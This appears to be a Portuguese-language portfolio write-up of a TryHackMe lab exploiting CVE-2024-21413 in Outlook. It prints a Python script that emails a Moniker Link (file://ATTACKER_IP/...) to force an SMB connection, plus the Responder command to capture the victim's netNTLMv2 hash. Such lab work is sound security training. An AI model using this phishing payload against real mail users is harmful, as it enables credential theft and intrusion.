
Exploit de prova de conceito para CVE-2024-21413 usando Moniker Link em e-mail HTML para acionar conexão SMB e capturar hashes netNTLMv2 via Responder. Demonstra habilidades em testes de penetração, script Python e análise de protocolos de rede.
Visão geral: Um PoC prático que demonstra o uso de um Moniker Link em um e-mail HTML para acionar uma conexão SMB a partir do Outlook, permitindo a captura do hash netNTLMv2 da vítima via Responder. Isso demonstra habilidades práticas em teste de penetração, desenvolvimento de scripts e análise de protocolos de rede.
file://) apontando para o compartilhamento SMB do atacante.# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124' # THM SMTP server
password = input('Enter attacker email password: ')
html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'
msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))
with smtplib.SMTP(mailserver, 25) as s:
s.ehlo()
s.login(sender, password)
s.sendmail(sender, [receiver], msg.as_string())
print('Email delivered')
Dica: Substitua ATTACKER_IP e mailserver antes de executar. No laboratório do TryHackMe, a senha é attacker.
responder -I ens5
Substitua ens5 pelo nome da sua interface de rede.
/etc/resolv.confÀs vezes o Responder falha devido a links simbólicos quebrados em /etc/resolv.conf. Corrija com:
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
Habilidades em destaque: Solução de problemas no Linux, configuração de DNS e adaptação de ferramentas para ambientes em nuvem/VM.
Erro / Problema com o resolv.conf:`

Correção de DNS Aplicada:

Script de E-mail em Python:

Entrega do Exploit:

Caixa de Entrada da Vítima:

Hash da Vítima Capturado:

Adaptado do laboratório MonikerLink do TryHackMe e do PoC original de CMNatic (GitHub)